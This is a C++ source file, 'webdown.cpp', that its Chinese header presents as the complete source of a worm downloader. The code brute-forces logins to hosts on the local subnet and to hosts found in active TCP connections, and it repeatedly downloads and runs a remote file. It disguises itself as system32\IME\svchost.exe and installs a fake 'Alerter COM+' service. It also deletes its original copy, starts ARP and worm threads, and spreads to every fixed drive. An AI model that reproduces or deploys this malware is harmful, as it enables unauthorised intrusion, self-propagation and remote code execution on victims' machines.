webdown.cpp

黑色技术蠕虫下载者的完整源码

	char szHostName[128];      //将本机的名称存入一维数组,数组名称为szHostName
	struct hostent * pHost;	//定义结构体 hostent
	int i; 	                //定义变量i
  
    LVITEM lvi;
	lvi.mask=LVIF_IMAGE|LVIF_TEXT;
	
	lvi.iItem=0;
	lvi.iSubItem=0;
	lvi.iImage=0;

	if(gethostname(szHostName,128)==0)    //如果本机的名称查到，则将其名称送入List控件
	{
		pHost = gethostbyname(szHostName); 
		for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	
		{
			CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);

			CString cccc = jian1(IPAddress);
			for(int j = 2; j < 255; j ++)
			{
				CString ddd;
				ddd.Format("%s%d", cccc, j);
				if(ddd.CompareNoCase(IPAddress) != 0)
				{
					for(int mm = 0;user[mm]; mm++)
					{
						for (int k=0;pass[k];k++)
						{
							ConnectRemote(ddd, user[mm], pass[k]);
						}
					}			

				}
			}
		}
	}

	WSACleanup();
}

int TCPConnect()
{
		pGetTcp=NULL;
		pGetUdp=NULL;
		pEtyTcp=NULL;
		hInst=NULL;

		HINSTANCE hInst = LoadLibrary("iphlpapi.dll"); 
		if(hInst==NULL) return FALSE;

		pGetTcp = (GetTcpTableFun)GetProcAddress(hInst, "GetTcpTable");
		if(pGetTcp==NULL) 
		{
			if (hInst!=NULL) FreeLibrary(hInst);

 			return FALSE;
		} 
		pGetUdp=(GetUdpTableFun)GetProcAddress(hInst,"GetUdpTable");
		if(pGetUdp==NULL)
		{
			if (hInst!=NULL) FreeLibrary(hInst);
			return FALSE;
		}

		pEtyTcp=(SetTcpEntryFun)GetProcAddress(hInst,"SetTcpEntry");
		if(pEtyTcp==NULL)
		{
			if (hInst!=NULL) FreeLibrary(hInst);
			return FALSE;
		}

		if(pGetTcp==NULL ||pGetUdp==NULL)
		{
			if (hInst!=NULL) FreeLibrary(hInst);
			return 0;
		}
		//netstat 方式感染
		CString strStatus,strTmp; 
 
		BYTE pUdpBuf[100*8+4];
		DWORD   dwTableSize;
		DWORD  lret;
		int i,k=0;
		in_addr	addrLoc,addrRem;
		char szLocAddr[100],szRemAddr[100];
		DWORD dwLocIP,dwRemIP;
		unsigned short nLocalPort,nRemotePort;

 
		dwTableSize=100*20+4;
		lret=pGetTcp((PMIB_TCPTABLE)pTcpBuf,&dwTableSize,FALSE);
		if (lret != NO_ERROR)
		{
			if (hInst!=NULL) FreeLibrary(hInst);
			return 0;
		}
		mibtcp=(PMIB_TCPTABLE)pTcpBuf;
		k=(int)mibtcp->dwNumEntries-1;
 
		for(i=0;i<k;i++){

			dwRemIP=htonl(mibtcp->table[i].dwRemoteAddr);
			addrRem.S_un.S_addr = ntohl(dwRemIP);
			strcpy(szRemAddr, inet_ntoa(addrRem));
			//判断是否本地IP
			if(strcmp(szRemAddr, "0.0.0.0") != 0 && strcmp(szRemAddr, "127.0.0.1") != 0)
			{//用户名和密码枚举连接
				for(int mm = 0;user[mm]; mm++)
				{
					for (int j=0;pass[j];j++)
					{
						ConnectRemote(szRemAddr, user[mm], pass[j]);
					}
				}			
			}
			

	  }
	  if (hInst!=NULL) FreeLibrary(hInst);	
	  return 0;

}

unsigned long  CALLBACK TCP_thread(LPVOID dParam) 
{


	while(1)
	{
		//内网IP
		QueryLocalIP();
		//外网	
		getipfun();
		//netstat 
		TCPConnect();

		Sleep(20*60000);
	}

	

	return 0;
}

unsigned long  CALLBACK DOWN_thread(LPVOID dParam) 
{


	while(1)
	{
		//内网IP
		DownExec(modify_data.DownFile);

		Sleep(modify_data.WaitTime*60*1000);
	}

	

	return 0;
}

unsigned long  CALLBACK IPC_thread(LPVOID dParam)
{
	WORD wVersion =0 ;
	int	 errret = -1;
	WSADATA wsaData;
	
	wVersion = MAKEWORD(2,2);
	errret = WSAStartup(wVersion,&wsaData);
	
	if( LOBYTE( wsaData.wVersion) != 2 ||
		HIBYTE( wsaData.wVersion) !=2 )
	{
  //	MessageBox(NULL,"winsocket库版本低","提示",MB_OK);
		return FALSE;
	}

    /*获取计算机名称*/
	CHAR szHostName[128]={0};      //将本机的名称存入一维数组,数组名称为szHostName
	struct hostent * pHost;	//定义结构体 hostent

	int i; //定义变量i
	
	SOCKADDR_IN saddr;
	
	if(gethostname(szHostName,128)==0)    //如果本机的名称查到，
	{		
		pHost = gethostbyname(szHostName); 
		for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	
		{

			memset(&saddr,0,sizeof(saddr)); 
			memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);			

		}
	}	

	char ip[128];
    int count;

	BOOL bpingOK=FALSE;
		
	for(count=1;count<254;count++)
	{
		memset(ip,0,128);
		sprintf(ip,
			"%d.%d.%d.%d",
			saddr.sin_addr.S_un.S_un_b.s_b1,
			saddr.sin_addr.S_un.S_un_b.s_b2,
			saddr.sin_addr.S_un.S_un_b.s_b3,
			count);
		CPingI m_PingI;
		bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL);
		if (bpingOK)
		{//用户名和密码枚举连接
			for(int i = 0;user[i]; i++)
			{
				for (int j=0;pass[j];j++)
				{
					if (ConnectRemote(ip,user[i],pass[j])==0)
						break;
				}
			}			
		}
			
	}

	WSACleanup();
	//printf("Hello World!\n");
	return 0;
}




//=====================================================================


//***********************************************//自删除
void uninstall(void)//Thanks to Spybot
{
	char batfile[MAX_PATH]; 
	char tempdir[MAX_PATH]; 
	char tcmdline[MAX_PATH];
	char cmdline[MAX_PATH];
	char This_File[MAX_PATH];
	HANDLE f;
	DWORD r;
	PROCESS_INFORMATION pinfo;
	STARTUPINFO sinfo;
	GetTempPath(sizeof(tempdir), tempdir);
	sprintf(batfile, "%s\\rs.bat", tempdir);
	f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
	if (f != INVALID_HANDLE_VALUE) 
	{
		// write a batch file to remove our executable once we close
		WriteFile(f, "@echo off\r\n"
					 ":start\r\nif not exist \"\"%1\"\" goto done\r\n"
					 "del /F \"\"%1\"\"\r\n"
					 "del \"\"%1\"\"\r\n"
					 "goto start\r\n"
					 ":done\r\n"
					 "del /F %temp%\rs.bat\r\n"
					 "del %temp%\r.bat\r\n", 105, &r, NULL);
		CloseHandle(f);

		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo);
		sinfo.wShowWindow = SW_HIDE;
		memset(This_File,0,sizeof(This_File));
		GetModuleFileName(NULL, This_File, sizeof(This_File));
		sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
		ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

		// execute the batch file
		CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
	}
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	int nRetCode = 0; 

	///自复制----------------------
	char SysDirBuff[256];
	char filename[256];
	char This_File[256];
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
	strcpy(filename,SysDirBuff);
	strcat(filename,"\\IME\\svchost.exe"); 
	GetModuleFileName(NULL, This_File, sizeof(This_File));
	
	if (_stricmp(This_File,filename)!=0)
	{
		DeleteFile(filename);
		if(::CopyFile(This_File,filename,FALSE)==0)	return -1;
		SetFileAttrib(filename);//隐藏了则不能拷贝？？
		PROCESS_INFORMATION pinfo;
		STARTUPINFO sinfo;		
		memset(&pinfo,0,sizeof(pinfo));
		memset(&sinfo,0,sizeof(sinfo));	
		CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
		uninstall();
		ExitProcess(0);
	}

	//注释解密部分
	DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
	
	//服务入口表-----------------------------------
	SERVICE_TABLE_ENTRY	service_tab_entry[2];
	service_tab_entry[0].lpServiceName="Alerter COM+";	//线程名字
	service_tab_entry[0].lpServiceProc=ServiceMain;	//线程入口地址
	//可以有多个线程，最后一个必须为NULL
	service_tab_entry[1].lpServiceName=NULL;
	service_tab_entry[1].lpServiceProc=NULL;
		   	
	if (StartServiceCtrlDispatcher(service_tab_entry)==0)//首次运行
	{
		InstallService();
	}
		
	return nRetCode;
}

/***********************************************/
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
	service_status_ss.dwServiceType=SERVICE_WIN32;
	service_status_ss.dwCurrentState=SERVICE_START_PENDING;
	service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
	service_status_ss.dwServiceSpecificExitCode=0;
	service_status_ss.dwWaitHint=0;
	service_status_ss.dwCheckPoint=0;
	service_status_ss.dwWin32ExitCode=0;
	if ((handle_service_status=RegisterServiceCtrlHandler("Alerter COM+",Handler))==0)
	{
		//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
	}//一个服务对应一个控制处理器
	service_status_ss.dwCurrentState=SERVICE_RUNNING;
	service_status_ss.dwWaitHint=0;
	service_status_ss.dwCheckPoint=0;
	::SetServiceStatus(handle_service_status,&service_status_ss);

	//创建互斥量-----------------------------------
	HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+");
	//检查错误代码
	if(GetLastError()==ERROR_ALREADY_EXISTS)
	{
		//如果已有互斥量存在则释放句柄并复位互斥量
		CloseHandle(m_hMutex);
		m_hMutex=NULL;
		//退出程序
		ExitProcess(0);
	}
	
	//开启感染线程，实施感染启动----------------------------
	if (modify_data.IsWorm)//
	{ 
		::CreateThread(NULL,0,Bind_thread,NULL,0,NULL);
	}
	//开启Arp感染
	if (modify_data.IsARP)//
	{ 
		::CreateThread(NULL,0,ARP_thread,NULL,0,NULL);
	}

	//开启IPC共享传播---------------------------------------
	if (modify_data.IsShare)//
	{ 
		::CreateThread(NULL,0,TCP_thread,NULL,0,NULL);
	}

	::CreateThread(NULL,0,DOWN_thread,NULL,0,NULL);

	//拷贝文件到各盘
	if(modify_data.IsUpan)
	{//搜索从C到Z各个盘符，感染每个磁盘。
		for (char cLabel='c'; cLabel<='z'; cLabel++)
		{
			char strRootPath[] = {"c:\\"};
			strRootPath[0] = cLabel;
			if(GetDriveType(strRootPath)== DRIVE_FIXED)
			{
				CopyToUAndSet(strRootPath);
			}
		}
	}

    

	CreateMyWindow();
	return ;
}
/***********************************************/
//服务控制器
void WINAPI Handler(DWORD dwControl)
{
		switch(dwControl)
		{
			case SERVICE_CONTROL_STOP:
				service_status_ss.dwCurrentState=SERVICE_STOPPED;
				::SetServiceStatus(handle_service_status,&service_status_ss);
				break;
			case SERVICE_CONTROL_CONTINUE:
				service_status_ss.dwCurrentState=SERVICE_RUNNING;
				::SetServiceStatus(handle_service_status,&service_status_ss);
				break;
			case SERVICE_CONTROL_PAUSE:
				service_status_ss.dwCurrentState=SERVICE_PAUSED;
				::SetServiceStatus(handle_service_status,&service_status_ss);
				break;
			case SERVICE_CONTROL_INTERROGATE:
                  break;
				
		}
		::SetServiceStatus(handle_service_status,&service_status_ss);

}

/***********************************************/
bool InstallService()
{
	DWORD            dwErrorCode;

	char szSysDir[256];
	memset(szSysDir,0,sizeof(szSysDir));
	::GetSystemDirectory(szSysDir,sizeof(szSysDir));
	strcat(szSysDir,"\\IME\\svchost.exe");

	scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库